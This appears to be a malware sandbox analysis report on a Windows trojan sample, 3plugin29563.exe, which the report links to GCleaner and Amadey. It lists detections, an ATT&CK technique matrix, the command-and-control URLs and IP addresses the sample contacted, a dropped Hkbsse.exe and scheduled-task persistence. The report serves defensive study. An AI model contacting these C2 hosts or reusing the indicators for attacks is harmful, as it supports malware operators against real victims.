Source: Yara match	File source: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2155291300.0000000002180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2335941103.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0042EBE8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_0042EBE8
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0042DEF1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_0042DEF1
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0213E158 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_0213E158
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0213EE4F Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_0213EE4F
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00402400 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	21_2_00402400
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0042EBE8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	21_2_0042EBE8
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0042DEF1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	21_2_0042DEF1
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0071E158 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	21_2_0071E158
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0071EE4F Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	21_2_0071EE4F

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	31 Virtualization/Sandbox Evasion	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	25 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
3plugin29563.exe	66%	ReversingLabs	Win32.Trojan.GCleaner
3plugin29563.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	66%	ReversingLabs	Win32.Trojan.GCleaner

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
http://185.208.158.116/hb9IvshS01/index.php6	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.php.dg4	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php	100%	Avira URL Cloud	malware
http://185.208.158.116/hb9IvshS01/index.php.	100%	Avira URL Cloud	malware
http://185.208.158.116/	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.phpncoded	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php0	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpded	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.phpXc	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.php_	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpded)G	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.phpdedtG	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.phpC	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.phphp	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.php?	100%	Avira URL Cloud	malware
http://185.209.162.226/hb9IvshS03/index.php	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phptgpd3	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpvy	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.phpdedWG	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php#	100%	Avira URL Cloud	malware
http://185.208.158.116/hb9IvshS01/index.php774809c7ff7ced665178.	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php8ZCqAVXugLRw254fTMM=	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.php_	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php~	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.php5y	0%	Avira URL Cloud	safe
http://185.208.158.116/en-US	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.phpk	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php774809c7ff7ced665178A	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php/#	100%	Avira URL Cloud	malware
http://185.209.162.226/hb9IvshS03/index.phpg	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpdedLG	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.phphG	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.phpke	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.phphpded	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php2f	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpk	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phps	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php_	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.phpded	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpg	0%	Avira URL Cloud	safe
http://185.209.162.226/	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpO	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpiO	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.phpEZ	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.phpfgNd	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.phpdedL	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.php)G	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.php6	0%	Avira URL Cloud	safe
http://185.208.158.116/hb9IvshS01/index.php:	0%	Avira URL Cloud	safe
http://185.209.162.226/hb9IvshS03/index.php#	0%	Avira URL Cloud	safe
http://89.23.103.42/hb9IvshS02/index.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.208.158.116/hb9IvshS01/index.php	true	Avira URL Cloud: malware	unknown
http://185.209.162.226/hb9IvshS03/index.php	true	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.208.158.116/hb9IvshS01/index.php.	Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.209.162.226/hb9IvshS03/index.phpXc	Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.php_	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpded	Hkbsse.exe, 00000015.00000003.4525916182.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.phpncoded	Hkbsse.exe, 00000015.00000003.4525916182.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php0	Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.php.dg4	Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/	Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php6	Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpded)G	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.phpC	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.phpdedWG	Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.phpdedtG	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.php?	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.208.158.116/hb9IvshS01/index.phptgpd3	Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.phphp	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpvy	Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php#	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.208.158.116/hb9IvshS01/index.php774809c7ff7ced665178.	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php8ZCqAVXugLRw254fTMM=	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.php5y	Hkbsse.exe, 00000015.00000002.4558467776.000000000084F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.php_	Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php/#	Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.208.158.116/hb9IvshS01/index.php~	Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/en-US	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.phpk	Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php774809c7ff7ced665178A	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.phpg	Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.phphG	Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.phpke	Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpdedLG	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpk	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.phphpded	Hkbsse.exe, 00000015.00000003.4525916182.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php2f	Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phps	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php_	Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
http://185.209.162.226/hb9IvshS03/index.phpded	Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpg	Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/	Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpiO	Hkbsse.exe, 00000015.00000003.4524612993.000000000082B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpO	Hkbsse.exe, 00000015.00000003.4524612993.000000000082B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.phpdedL	Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://89.23.103.42/hb9IvshS02/index.phpEZ	Hkbsse.exe, 00000015.00000003.4524612993.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.phpfgNd	Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.php6	Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.php)G	Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.208.158.116/hb9IvshS01/index.php:	Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.209.162.226/hb9IvshS03/index.php#	Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.208.158.116	unknown	Switzerland	34888	SIMPLECARRER2IT	true
89.23.103.42	unknown	Russian Federation	48687	MAXITEL-ASRU	true
185.209.162.226	unknown	Netherlands	14576	HOSTING-SOLUTIONSUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1499741
Start date and time:	2024-08-27 14:18:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3plugin29563.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/68@0/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 60 Number of non-executed functions: 336
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.65.92, 20.189.173.21
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 3plugin29563.exe

Simulations

Behavior and APIs

Time	Type	Description
08:19:10	API Interceptor	1x Sleep call for process: WerFault.exe modified
08:19:16	API Interceptor	8118477x Sleep call for process: Hkbsse.exe modified
14:18:59	Task Scheduler	Run new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.208.158.116	file.exe	Get hash	malicious	Amadey	Browse	185.208.158.116/hb9IvshS01/index.php
89.23.103.42	file.exe	Get hash	malicious	Amadey	Browse	89.23.103.42/hb9IvshS02/index.php
185.209.162.226	file.exe	Get hash	malicious	Amadey	Browse	185.209.162.226/hb9IvshS03/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MAXITEL-ASRU	setup.exe	Get hash	malicious	RedLine	Browse	89.23.97.185
	http://go.tenoaksadvisors.com.	Get hash	malicious	Unknown	Browse	89.23.110.52
	TYg9Jx5SUa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	89.23.100.125
	http://www.trailhopper.com.au/	Get hash	malicious	Unknown	Browse	89.23.110.52
	https://ximasoftware.com/ehr-emr-integration	Get hash	malicious	Unknown	Browse	89.23.110.52
	https://tonaquint.com/	Get hash	malicious	Unknown	Browse	89.23.110.52
	http://www.lapumpandvalve.com	Get hash	malicious	Unknown	Browse	89.23.110.52
	http://www.lifebooster.ca	Get hash	malicious	Unknown	Browse	89.23.110.52
	SecuriteInfo.com.Win32.PWSX-gen.5633.32526.exe	Get hash	malicious	PureLog Stealer	Browse	89.23.97.161
	SecuriteInfo.com.Win32.PWSX-gen.5633.32526.exe	Get hash	malicious	PureLog Stealer	Browse	89.23.97.161
HOSTING-SOLUTIONSUS	ExeFile (200).exe	Get hash	malicious	Unknown	Browse	185.130.105.44
	ExeFile (200).exe	Get hash	malicious	Unknown	Browse	185.130.105.44
	Mega.nz Spreader.exe	Get hash	malicious	Laplas Clipper, Meduza Stealer	Browse	45.159.189.105
	file.exe	Get hash	malicious	Amadey	Browse	185.209.162.226
	http://tqwwwcom.ru/	Get hash	malicious	Unknown	Browse	204.155.30.34
	xworm.exe	Get hash	malicious	Unknown	Browse	185.209.160.70
	Fb9Ff8L4T7	Get hash	malicious	RHADAMANTHYS	Browse	185.209.160.99
	file.exe	Get hash	malicious	Vidar, Xmrig	Browse	185.209.162.208
	file.exe	Get hash	malicious	Vidar, Xmrig	Browse	185.209.162.208
	05F1TC85Up.exe	Get hash	malicious	DanaBot	Browse	45.159.189.76
SIMPLECARRER2IT	install.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	install.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	file.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	file.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	file.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	crt.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	file.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	file.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214
	http://cafedelmarcartagena.com	Get hash	malicious	Unknown	Browse	185.196.8.220
	file.exe	Get hash	malicious	Socks5Systemz	Browse	185.196.8.214

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_3plugin29563.exe_24d5fca43d372419e7b148d8e0f619ddefa25f40_50c3897d_05546f1e-fda7-4b33-a979-93587c271247\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
